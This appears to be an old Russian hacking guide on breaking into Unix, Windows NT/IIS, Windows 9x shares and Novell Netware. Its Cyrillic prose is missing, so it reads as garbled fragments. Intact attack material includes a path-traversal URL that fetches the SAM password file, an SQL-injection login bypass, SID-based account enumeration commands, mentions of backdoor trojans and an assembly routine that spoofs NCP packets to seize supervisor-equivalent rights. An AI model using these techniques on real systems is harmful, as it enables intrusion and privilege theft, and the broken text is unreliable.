
1         Unix

   TCP/IP      Internet. ,     ,           .  ,     ,      .    Internet                  .   , ,        .          WEB-  .  ,          ,                 WEB-.         .      .  ,     cgi-. ,    , ..               .   ,     . ,        .         ,        . 

 .

  ,   ,       ,        .      ,   .         : FTP-, telnet, sendmail, NFS  ..        ,      shell              .

                 (buffer overflows).         -   1988 .         .     ,  ,         ,            .        ,     . , , 9  13  CERT (Computer Emergency Response Team site)  1998        1999     .      Bugtraq ,   2/3         . ,          . ,              . 

      -    ,           .  ,     ,            .         .        .         , ,      ,     .

   . 

     IP       sendmail,    .     ,            Unix-.        ,              .       passwd         ,   rlogin, rsh   shell   . 

         Unix   .  ,        :   Sun,  SunOS 4, NIS  ,  ,    .

 NFS.

    TCP/IP         ,      Network File System (NFS).      /etc/exports      (SunOS 4.1)    . 

    NIS-     ,           passwd,     .       ,    ,   crack  .             ( ,        ). 

,      ,       .          ,           .         (cisco, wellfleet...)       Unix- (Sun, DEC, BSDI, FreeBSD). 

          . ,   /    .    rlogin, rsh, RPC (. ),   ,    2048  2049, -     NFS.     ,  ,    25   .    ,    -      ,       TCP-  .              ( . firewall -  ). 

             (software firewall).     ,         IP-,      . 

       ,   ,      (telnet, ftp...),  ,          ,              . 

 ,              ,  IP-. , IP-     IP-           . 

2        MS Windows NT/2000/XP/2003

 WinNT,   firewall'   135-139 ,  .

 1.  .

 .     ,   135-139,   WinNT.   139,      Windows 9x.    WinNT, ..   135-139 .

 2.  .  . 

              . 

      : 

)   ;

)   ;

)   .

        Legion.   ip -  192.143.198.0,    ip -  192.143.198.255. 

  . ,   .    . 

      .      23.  ,       () nbtstat   -A 192.143.198.     .    ,  ,      . 

      IP Network Browser.   . 

       telnet,    80 (http), 25 (smtp), 21 (ftp).   .    DumpACL,     Win32     . 

 3.   .

  ,    ,   cgi  ,   asp    . 

    WinNT   asp  cgi,   ,      ,      .  c asp,         asp.     ,   .   ,     Web-.            (file.asp.)       %2e,        .    ?     (), ,   xakep.ru   edit.asp  ()   ,    .          ::$DATA     .      ,     SAM.   ,    WinNT           SAM.           codebrws.asp,      SAM,     : codebrws.asp?source=/../../../../winnt/repair/sam._ 

  shopdbtest.asp,   ,        xDatabase.    . 

   ,   shopping400.mdb/shopping300.mdb   .      ,           .      vpasp/vpasp  admin/admin.   Web     .        ,        : 'or''='   shopadmin.asp.     -. 

   :

-     .   4.0, 5.0  5.1 IIS    ,         .

-     http-.

-    "server-side includes"  ISAPI ,   HTR .

  ,    :

- ,         -.       ISAPI    ,   -        FTP  FTP.

-    "Cross-Site Scripting":       IIS,  -    http- (http error page),   -  ,     URL

        default.asp.           :      :

http://www.xxx.com/default.asp?sector=anything

: http://www.xxx.com/zzz/default.asp?sector=lamers

     :

error '80020009' Exception occurred. D:SITIOS_WEBTECTIMESNUEVOzzz../body.htm, line 74 

    ,        .

 cgi     (   ).  WinNT           Unix, ..      ,   Windows . 

 4.   SAM  .

         ,             .    guest    .     ,   ,    Unix,      root, a     admin, administrator  . 

        "",      ,     .  -   , , .           .     .      ,     .   . 

 5.  .

,             .   ,     ,  .      ,    . 

 6. .

             SAM   .      . 

  (    ).

         . ,  ,   User2Sid  Sid2User. 

:

user2sid IP-   "Power users" 

user2sid IP-   "Domain users"

   :

S-1-5-25-8215467-1456327812-162345100-513

    :

sid2user IP-   5 25 8215467 1456327812 162345100 500

   500,   ,      Uid   0. 

    :

Name is pupkin.

     .     :

1. net view IP- 

2. nbtstat -A IP- 

3.  Legion.

4.   Enum (   NT/2000).      ,      .

:

1.   .

     Brutus       ,   Cerberus InternetScanner: http://www.cerberus-infosec.co.uk/cis.shtml

2.   . 

     technotronic.com  securityfocus.com   WinNT (IIS - 4,5). , iishack.

3.     ,     ,    - ,    ,  ,    .         -    .       "" ,     .   ,   (lophtcrack),    .

4.    . 

    NT   ,      : NetBus, Back Orifice  SubSeven   keylogger.

5.   Unicode.

  ,   IIS 4.0  5.0    Windows NT 4.0  Windows 2000.      ,   ,  ,  ,   .   Unicode     -   -  ,      : -       - ,   .

3    

     .       , ,    ,  ,    . 

        : Microsoft Network  Novell Netware. 

     . 

  Microsoft. 

  ,    ,      Windows 95/98/ME,   ,      ,               Microsoft     .      .     . 

         Windows . 

,   . 

    ,    ... 

    ?  , .   , ,     ,    .   ,    (,   "install", "temp"),      ,   -  "obmen"  "income",     .      .       "c", "d"...   .    ,   .    .     "Windows"     *.pwl       .    ,          - . ,  oleg.pwl      ,    .   ,        .   PWL    ,         .     ,      ,      .        ,     PWL,    ... 

     PWL?  .          .   ? PWL -  "",     ,        . 

 ,   PWL,     - ,      .      ,    (  ).           .     PWL    . 

   ?      "$"   ,         .      ,     .        "C$",       . 

 . 

  ?       .    ? , ,    ,          ,   .        ,  -  . 

      - "", "comp_name emp1$" (  C).    ?     SHI50F_FULL | SHI50F_SYSTEM | SHI50F_PERSIST,      "$".  , : 
1)    . 

2)   . ..   ()   ,   . 

3)       . 

           .    ,    .      , ,    ,  .     -  "   ".     ,     .          ,     . .    .     .        .        .     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan. ,     reg ,       .    ,        .    exe    . 

           ,      .      .         .  ,     (Win9x only): 

#include <windows.h>
#include <winnetwk.h>

// inputs - char *resname, char *password
DWORD RetVal;
NETRESOURCE nr;
ZeroMemory(&nr, sizeof(nr));   // lpLocalName and lpProvider must be NULL, not garbage
nr.lpRemoteName = resname;
nr.dwType = RESOURCETYPE_DISK;
RetVal = WNetAddConnection2(&nr, password, NULL, CONNECT_UPDATE_PROFILE);

 . 

     ,    Win9x,    .       NT,        /.      ,   .    ,   (/ -    )     NT.      ,       -         . 

       .   Win95/98/Me    .    SMB- Microsoft  , ,    ,     ,    , ,  ,       ,    .        ,      "PQWak".       .       ,   ,     "xIntruder".  ,    ,      .       ,          7 .  ,   ,     Microsoft   ,   . 

     TCP,    139-   ,     .       IPX,  .            ,     TCP,  IPX. 

  ... 

 ,          ,  , .   ( ),      TCP,  ,     .     telnet, ftp, pop3    (:       -    "   ",        "TCP_LOGGER").     "ssh", "apop"  ,          .   ,  ,  ,     SMB .      .      "LANMAN1.0"  .,    ,   "LANMAN2.1"  "NT LM 0.12"     ,  ,      hash-. , ,  ,     .      ,         ,    .         ,       . 

 . ,       NT.   L0phtCrack     "sniffing".            .       . 

     ? 

-,       NT,          Windows95/98/Me,      ,     LANMAN2.1,     ,      NT   ,   Windows9x - . 

-,  , ,   . , ,  -  ,   ,  "collision domain".  ,    ,        ,       .    ,    "collision domain"   "broadcast domain".    MAC      "route table".  ,  - ,      ,        .  (!),        MAC ,         ,      ,   ARP,  ICMP      .  ,       ...           UInC. 

   ? 

     . 

      ?      internet,    ,   -   proxy.      ,         IPX/SPX.   proxy      TCP->SPX->TCP. (        internet  "Novell Netware",     802.3).       -   ... , ,          . ,     "Program Files",  "Temporary Internet Files" (). 

 Novell Netware. 

     .     . 

1.  . 

 ,                Netware Core Protocol (NCP)    IPX.         0  255    .     Sequence Number.    . 

---------------    ------------------ 
ReceiverAddress       6   Normal
SenderAddress         6   Normal
DataLength            2   High-Low
--------------------   IPX ----------------- 
CheckSum              2   Normal
IpxLength             2   High-Low
HopCount              1   -
PacketType            1   -
DestNetwork           4   Normal
DestNode              6   Normal
DestSocket            2   Low-High
SourceNetwork         4   Normal
SourceNode            6   Normal
SourceSocket          2   Low-High
----------------------   NCP -------------------
RequestType           2   Low-High
SequenceNumber        1   -
ConnectionNumberLow   1   -
TaskNumber            1   -
ConnectionNumberHigh  1   -   0.
FunctionCode          1   -
------------------   NCP ------------------------

  .        .   ,   ,  , ,    sequence number.  -           . 

2.  . 

       ,   .         ,   ,    ..     ,         .   - sequence number,           .   ,           255    sequence numbers. 

3.    

        .     EQUIVALENT TO ME,      .    . 

    EQUIVALENT TO ME 

; -------------------    --------------- 
RecAdr              db 00,20h,0afh,4fh,5fh,0ah
SndAdr              db 00,20h,0afh,089h,022h,0afh
DataLength          db 01,68h
; -----------------------  IPX  ------------------- 
                    dw 0ffffh                    ; CheckSum
IpxLength           db 01,67h
                    db 0                         ; HopCount
                    db 17                        ; PacketType
DestNetwork         db ?,?,?,?
DestNode            db ?,?,?,?,?,?
DestSocket          db 04,51h
SourceNetWork       db 00,00,01,02
SourceNode          db ?,?,?,?,?,?
SourceSocket        db 40h,03
; ---------------------   NCP -------------------- 
                    db 22h,22h                   ; RequestType
SequenceNumber      db 48
ConnectionNumberLow db 24
                    db 4                         ; TaskNumber
                    db 0                         ; ConnectionNumberHigh
                    db 68h                       ; FunctionCode
                    db 2
; ------------------------   NCP -------------------- 
                    dd -1
                    dd 514
S1_2:               dd offset S1_1 - offset S1_2-4
                    dd 0
                    dd 9
                    dd 0
                    dd 0
                    dd 0
S1ID                db 67h,02h,00,06h
                    dd 1
                    dd 5
                    dd 34
                    db 'E',0,'q',0,'u',0,'i',0,'v',0,'a',0,'l',0,'e',0
                    db 'n',0,'t',0,' ',0,'T',0,'o',0,' ',0,'M',0,'e',0
                    dd 0
                    dd 1
                    dd 26
                    db '3',0,'1',0,'0',0,'5',0,'.',0,'I',0,'N',0,'F',0
                    db '.',0,'T',0,'S',0,'U',0
S1_1:

  , , , ID,   -  . . 

   

ah=E3h 
ds:si=> ConReq 
    dw 2 -  
    db 16h -  
    db ? -   
es:di=> ConRep 
    dw 62 -  
    db 4 dup (?) 
    dw ? -   
    db 56 dup (?) -   
int 21h 

     IPX  ( 9),            .  ,       .      LSL ,    .    -   ODIPKT  ( 4).    Odipkt 

ah=4 
cx= 
ds:si=> 
int 60h 
C=1   

   

Send proc 
    mov SequenceNumber,0 
@@1:
    push ds 
    push es 
    mov ah,4 
    mov cx,Length 
    mov si,offset Packet 
    int 60h 
    pop es 
    pop ds 
    jc @@1                  ; retry while the driver reports an error (C=1)
    mov cx,1000 
    loop $                  ; short delay before the next packet
    dec SequenceNumber 
    jne @@1 
    ret 
Send endp 

4..

          1 sequence number.            ,  .      255*256 . 

,      .       ,      . ,         ,       . 

  : 

1.     :   ,       ,   . 

2.  ,   . 

3.  . 

4.     . 

5.     . 

6.           .  ,    :    , . 
The End...